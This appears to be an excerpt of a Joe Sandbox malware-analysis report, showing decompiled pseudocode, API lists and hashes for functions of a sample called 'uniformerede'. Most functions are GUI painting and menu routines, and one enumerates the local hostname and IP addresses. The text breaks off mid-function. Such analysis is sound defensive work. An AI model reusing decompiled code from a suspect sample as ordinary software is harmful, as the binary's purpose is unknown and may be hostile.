                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0043F3B8 Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0043F3B8(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E00441704(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x43f4d8);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E0041AC6C( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0043F510(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x43f4df);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E00441704(_v8),  &_v84);
				}
				return _t55;
			}


















                                                                                                                                                                                                                            0x0043f3b9
                                                                                                                                                                                                                            0x0043f3bb
                                                                                                                                                                                                                            0x0043f3c1
                                                                                                                                                                                                                            0x0043f3c4
                                                                                                                                                                                                                            0x0043f3ca
                                                                                                                                                                                                                            0x0043f3cf
                                                                                                                                                                                                                            0x0043f3e3
                                                                                                                                                                                                                            0x0043f3e3
                                                                                                                                                                                                                            0x0043f3e7
                                                                                                                                                                                                                            0x0043f3e8
                                                                                                                                                                                                                            0x0043f3ed
                                                                                                                                                                                                                            0x0043f3f0
                                                                                                                                                                                                                            0x0043f3fd
                                                                                                                                                                                                                            0x0043f417
                                                                                                                                                                                                                            0x0043f41a
                                                                                                                                                                                                                            0x0043f42d
                                                                                                                                                                                                                            0x0043f430
                                                                                                                                                                                                                            0x0043f432
                                                                                                                                                                                                                            0x0043f433
                                                                                                                                                                                                                            0x0043f435
                                                                                                                                                                                                                            0x0043f440
                                                                                                                                                                                                                            0x0043f449
                                                                                                                                                                                                                            0x0043f45b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f45d
                                                                                                                                                                                                                            0x0043f479
                                                                                                                                                                                                                            0x0043f480
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f480
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f482
                                                                                                                                                                                                                            0x0043f482
                                                                                                                                                                                                                            0x0043f483
                                                                                                                                                                                                                            0x0043f483
                                                                                                                                                                                                                            0x0043f435
                                                                                                                                                                                                                            0x0043f486
                                                                                                                                                                                                                            0x0043f48a
                                                                                                                                                                                                                            0x0043f493
                                                                                                                                                                                                                            0x0043f493
                                                                                                                                                                                                                            0x0043f49e
                                                                                                                                                                                                                            0x0043f3ff
                                                                                                                                                                                                                            0x0043f406
                                                                                                                                                                                                                            0x0043f406
                                                                                                                                                                                                                            0x0043f4aa
                                                                                                                                                                                                                            0x0043f4b1
                                                                                                                                                                                                                            0x0043f4b4
                                                                                                                                                                                                                            0x0043f4b7
                                                                                                                                                                                                                            0x0043f4bc
                                                                                                                                                                                                                            0x0043f4c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043f4d2
                                                                                                                                                                                                                            0x0043f4d7

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • BeginPaint.USER32(00000000,?), ref: 0043F3DE
                                                                                                                                                                                                                            • SaveDC.GDI32(?), ref: 0043F412
                                                                                                                                                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043F474
                                                                                                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 0043F49E
                                                                                                                                                                                                                            • EndPaint.USER32(00000000,?,0043F4DF), ref: 0043F4D2
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3808407030-0
                                                                                                                                                                                                                            • Opcode ID: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                                                                                                                                                                                            • Instruction ID: 9443a4bcddcea103c83dcf0c2b69b8a33cb36b1669e9c3c4d5886d405921b8f2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4ea672e3d9b3f4c2e1dab9854368b7484ecc5b1cbb8fc2f2094f499677641b8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA415070E00208AFC700DB99C984EAFB7F9AF58318F5490BAE90497362D739AE45CB54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044AD40 Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044AD40(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0044AD40(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0044AE70(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E0044AE70(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0044AE70(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E0044AC00(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x449854; // 0x4498a0
						if(E00403D78( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044AE70(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









                                                                                                                                                                                                                            0x0044ad40
                                                                                                                                                                                                                            0x0044ad44
                                                                                                                                                                                                                            0x0044ad4a
                                                                                                                                                                                                                            0x0044ad54
                                                                                                                                                                                                                            0x0044ad56
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ad56
                                                                                                                                                                                                                            0x0044ad5f
                                                                                                                                                                                                                            0x0044ad64
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ad66
                                                                                                                                                                                                                            0x0044ad78
                                                                                                                                                                                                                            0x0044ad7d
                                                                                                                                                                                                                            0x0044ad81
                                                                                                                                                                                                                            0x0044ad86
                                                                                                                                                                                                                            0x0044ad8f
                                                                                                                                                                                                                            0x0044ad99
                                                                                                                                                                                                                            0x0044ada0
                                                                                                                                                                                                                            0x0044adb0
                                                                                                                                                                                                                            0x0044adb5
                                                                                                                                                                                                                            0x0044adb5
                                                                                                                                                                                                                            0x0044adb7
                                                                                                                                                                                                                            0x0044adb8
                                                                                                                                                                                                                            0x0044adbe
                                                                                                                                                                                                                            0x0044adc4
                                                                                                                                                                                                                            0x0044adf9
                                                                                                                                                                                                                            0x0044adfb
                                                                                                                                                                                                                            0x0044ae00
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ae06
                                                                                                                                                                                                                            0x0044adc9
                                                                                                                                                                                                                            0x0044add6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044ade9
                                                                                                                                                                                                                            0x0044aded
                                                                                                                                                                                                                            0x0044adf4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044adf4
                                                                                                                                                                                                                            0x0044add6
                                                                                                                                                                                                                            0x0044adbe
                                                                                                                                                                                                                            0x0044ae0d

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                                                                                                                                                                                            • Instruction ID: ccdcb766eb864ac881303502937fc5a84d080c6be124c079d60bb56e6bda1b55
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5343eef08e8d1dd02cbbfae1b5f1536b7b7bec594a8a1cd2160f538fd193b115
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7111D270EC521857FB60BEBA8806B5B378A5F41749F14042FBD119B782DA3CDC65829F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045A390 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0045A390(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x49e668 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E00437E5C(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E00441704(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                                                                                                                                                                                                            0x0045a390
                                                                                                                                                                                                                            0x0045a394
                                                                                                                                                                                                                            0x0045a396
                                                                                                                                                                                                                            0x0045a398
                                                                                                                                                                                                                            0x0045a39a
                                                                                                                                                                                                                            0x0045a3a2
                                                                                                                                                                                                                            0x0045a441
                                                                                                                                                                                                                            0x0045a447
                                                                                                                                                                                                                            0x0045a3b3
                                                                                                                                                                                                                            0x0045a3b8
                                                                                                                                                                                                                            0x0045a3bc
                                                                                                                                                                                                                            0x0045a422
                                                                                                                                                                                                                            0x0045a43f
                                                                                                                                                                                                                            0x0045a43f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a422
                                                                                                                                                                                                                            0x0045a3be
                                                                                                                                                                                                                            0x0045a3c0
                                                                                                                                                                                                                            0x0045a3c0
                                                                                                                                                                                                                            0x0045a3c5
                                                                                                                                                                                                                            0x0045a3e0
                                                                                                                                                                                                                            0x0045a3e9
                                                                                                                                                                                                                            0x0045a3de
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a3de
                                                                                                                                                                                                                            0x0045a3f1
                                                                                                                                                                                                                            0x0045a3f3
                                                                                                                                                                                                                            0x0045a3f3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a3cf
                                                                                                                                                                                                                            0x0045a3d4
                                                                                                                                                                                                                            0x0045a3f5
                                                                                                                                                                                                                            0x0045a40e
                                                                                                                                                                                                                            0x0045a410
                                                                                                                                                                                                                            0x0045a410
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045a40e
                                                                                                                                                                                                                            0x0045a3c5

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$CaptureLongWindow
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1158686931-0
                                                                                                                                                                                                                            • Opcode ID: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
                                                                                                                                                                                                                            • Instruction ID: 3b7db6bc04ec6c9b9a315d118ec06550147a56b28b89c41b1f9545d3d98f8dbc
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b89e33d5f33cfaebd5b1cc37b20e9e534ad05d39b8e2e3f38a1a5aac5179a0b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 491193712042095F9620FA9DC884F1373CC9B15319B10453AFD59C3343EAACFC54826B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00442F0C Relevance: 7.6, APIs: 5, Instructions: 73COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 22%
                                                                                                                                                                                                                            			E00442F0C(void* __eax) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr* _t14;
				intOrPtr* _t17;
				intOrPtr _t19;
				intOrPtr* _t21;
				intOrPtr* _t26;
				intOrPtr _t37;
				void* _t39;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t52;

				_t49 = _t51;
				_t52 = _t51 + 0xfffffff4;
				_t39 = __eax;
				if( *((short*)(__eax + 0x68)) == 0xffff) {
					return __eax;
				} else {
					_t14 =  *0x49d970; // 0x49e900
					_t17 =  *0x49d970; // 0x49e900
					_t19 =  *((intOrPtr*)( *_t17))(0xd,  *((intOrPtr*)( *_t14))(0xe, 1, 1, 1));
					_push(_t19);
					L0042C408();
					_v8 = _t19;
					_push(_t49);
					_push(0x442fcc);
					_push( *[fs:eax]);
					 *[fs:eax] = _t52;
					_t21 =  *0x49de0c; // 0x49ebbc
					E0042C440(_v8, E004586EC( *_t21,  *((short*)(__eax + 0x68))));
					_t26 =  *0x49de0c; // 0x49ebbc
					E0042C440(_v8, E004586EC( *_t26,  *((short*)(_t39 + 0x68))));
					_push(0);
					_push(0);
					_push(0);
					_push(_v8);
					L0042C48C();
					_push( &_v16);
					_push(0);
					L0042C49C();
					_push(_v12);
					_push(_v16);
					_push(1);
					_push(_v8);
					L0042C48C();
					_pop(_t47);
					 *[fs:eax] = _t47;
					_push(0x442fd3);
					_t37 = _v8;
					_push(_t37);
					L0042C410();
					return _t37;
				}
			}

















                                                                                                                                                                                                                            0x00442f0d
                                                                                                                                                                                                                            0x00442f0f
                                                                                                                                                                                                                            0x00442f13
                                                                                                                                                                                                                            0x00442f1a
                                                                                                                                                                                                                            0x00442fd7
                                                                                                                                                                                                                            0x00442f20
                                                                                                                                                                                                                            0x00442f28
                                                                                                                                                                                                                            0x00442f34
                                                                                                                                                                                                                            0x00442f3b
                                                                                                                                                                                                                            0x00442f3d
                                                                                                                                                                                                                            0x00442f3e
                                                                                                                                                                                                                            0x00442f43
                                                                                                                                                                                                                            0x00442f48
                                                                                                                                                                                                                            0x00442f49
                                                                                                                                                                                                                            0x00442f4e
                                                                                                                                                                                                                            0x00442f51
                                                                                                                                                                                                                            0x00442f58
                                                                                                                                                                                                                            0x00442f69
                                                                                                                                                                                                                            0x00442f72
                                                                                                                                                                                                                            0x00442f83
                                                                                                                                                                                                                            0x00442f88
                                                                                                                                                                                                                            0x00442f8a
                                                                                                                                                                                                                            0x00442f8c
                                                                                                                                                                                                                            0x00442f91
                                                                                                                                                                                                                            0x00442f92
                                                                                                                                                                                                                            0x00442f9a
                                                                                                                                                                                                                            0x00442f9b
                                                                                                                                                                                                                            0x00442f9d
                                                                                                                                                                                                                            0x00442fa5
                                                                                                                                                                                                                            0x00442fa9
                                                                                                                                                                                                                            0x00442faa
                                                                                                                                                                                                                            0x00442faf
                                                                                                                                                                                                                            0x00442fb0
                                                                                                                                                                                                                            0x00442fb7
                                                                                                                                                                                                                            0x00442fba
                                                                                                                                                                                                                            0x00442fbd
                                                                                                                                                                                                                            0x00442fc2
                                                                                                                                                                                                                            0x00442fc5
                                                                                                                                                                                                                            0x00442fc6
                                                                                                                                                                                                                            0x00442fcb
                                                                                                                                                                                                                            0x00442fcb

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73751AB0.COMCTL32(00000000), ref: 00442F3E
                                                                                                                                                                                                                              • Part of subcall function 0042C440: 73752140.COMCTL32(00439016,000000FF,00000000,00442F6E,00000000,00442FCC,?,00000000), ref: 0042C444
                                                                                                                                                                                                                            • 73751680.COMCTL32(00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F92
                                                                                                                                                                                                                            • 73751710.COMCTL32(00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442F9D
                                                                                                                                                                                                                            • 73751680.COMCTL32(00439016,00000001,?,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FB0
                                                                                                                                                                                                                            • 73751F60.COMCTL32(00439016,00442FD3,00443035,00000000,?,00439016,00000000,00000000,00000000,00000000,00442FCC,?,00000000), ref: 00442FC6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: 7375173751680$7375171073752140
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3191654781-0
                                                                                                                                                                                                                            • Opcode ID: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                                                                                                                                                                                            • Instruction ID: 31acb13db4a7b61839ae31ff436912f2200b31873635aba84f9d8170318329f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd8f6c6bef30573f89024d1b65c38e83719737ac9faca5af5380f6cb668c253e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B216F74B04204AFEB10EBA9DCD2F6E73F8EB48704F900066F904DB291DAB9AD40C758
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00472C58 Relevance: 7.6, APIs: 5, Instructions: 67networkCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E00472C58(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				char _v408;
				char _v412;
				char _v416;
				int _t30;
				char* _t38;
				signed int _t39;
				intOrPtr _t48;
				intOrPtr* _t53;
				intOrPtr _t55;
				void* _t56;
				void* _t58;

				_v416 = 0;
				_v412 = 0;
				 *[fs:eax] = _t58 + 0xfffffe64;
				_t38 = E00408D24(0x104, __eflags);
				L00472BD0();
				_v8 = E00403BBC(1);
				 *((intOrPtr*)( *_v8 + 0x44))(0x101,  &_v408,  *[fs:eax], 0x472d31, _t58, __edi, __esi, __ebx, _t56);
				E00404BB8( &_v412, _t38);
				_t30 = gethostname(_t38, E00404C80(_v412));
				_push(_t38);
				L00472BC0();
				if(_t30 != 0) {
					_t55 =  *((intOrPtr*)(_t30 + 0xc));
					_t39 = 0;
					while(1) {
						_t53 =  *((intOrPtr*)(_t55 + _t39 * 4));
						if(_t53 == 0) {
							break;
						}
						L00472BB8();
						E00404BB8( &_v416, _t30);
						_t30 =  *((intOrPtr*)( *_v8 + 0x38))( *_t53);
						_t39 = _t39 + 1;
						__eflags = _t39;
					}
					L00472BD8();
				}
				_pop(_t48);
				 *[fs:eax] = _t48;
				_push(0x472d38);
				return E004049E4( &_v416, 2);
			}















                                                                                                                                                                                                                            0x00472c66
                                                                                                                                                                                                                            0x00472c6c
                                                                                                                                                                                                                            0x00472c7d
                                                                                                                                                                                                                            0x00472c8a
                                                                                                                                                                                                                            0x00472c98
                                                                                                                                                                                                                            0x00472ca9
                                                                                                                                                                                                                            0x00472cb1
                                                                                                                                                                                                                            0x00472cbc
                                                                                                                                                                                                                            0x00472cce
                                                                                                                                                                                                                            0x00472cd3
                                                                                                                                                                                                                            0x00472cd4
                                                                                                                                                                                                                            0x00472cdb
                                                                                                                                                                                                                            0x00472cdd
                                                                                                                                                                                                                            0x00472ce0
                                                                                                                                                                                                                            0x00472d07
                                                                                                                                                                                                                            0x00472d07
                                                                                                                                                                                                                            0x00472d0c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00472ce6
                                                                                                                                                                                                                            0x00472cf3
                                                                                                                                                                                                                            0x00472d03
                                                                                                                                                                                                                            0x00472d06
                                                                                                                                                                                                                            0x00472d06
                                                                                                                                                                                                                            0x00472d06
                                                                                                                                                                                                                            0x00472d0e
                                                                                                                                                                                                                            0x00472d0e
                                                                                                                                                                                                                            0x00472d15
                                                                                                                                                                                                                            0x00472d18
                                                                                                                                                                                                                            0x00472d1b
                                                                                                                                                                                                                            0x00472d30

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WSAStartup.WSOCK32(00000101,?,00000000,00472D31), ref: 00472C98
                                                                                                                                                                                                                            • gethostname.WSOCK32(00000000,00000000), ref: 00472CCE
                                                                                                                                                                                                                            • gethostbyname.WSOCK32(00000000,00000000,00000000), ref: 00472CD4
                                                                                                                                                                                                                            • inet_ntoa.WSOCK32(?,00000000,00000000,00000000), ref: 00472CE6
                                                                                                                                                                                                                            • WSACleanup.WSOCK32(?,00000000,00000000,00000000), ref: 00472D0E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 348263315-0
                                                                                                                                                                                                                            • Opcode ID: f06fb68704c44451b8735ee50c57d78fe34c005703e9fb394dc065d854421570
                                                                                                                                                                                                                            • Instruction ID: f3059b0da6ec3e1b640db76434b3b8e2fe7969af481d0775728bf7a32dd752b6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f06fb68704c44451b8735ee50c57d78fe34c005703e9fb394dc065d854421570
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A521C3706001049FD760EF31CD91ADAB7F8EF45304F5184FAA94CA7352DAB8AE418B98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042A288 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                                                                            			E0042A288(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E00428BFC(_t22);
					}
					_t21 = E00426750( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L00407638();
						_t21 = E00426060(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L00407380();
							_push(0xe);
							_push(_t38);
							L00407380();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
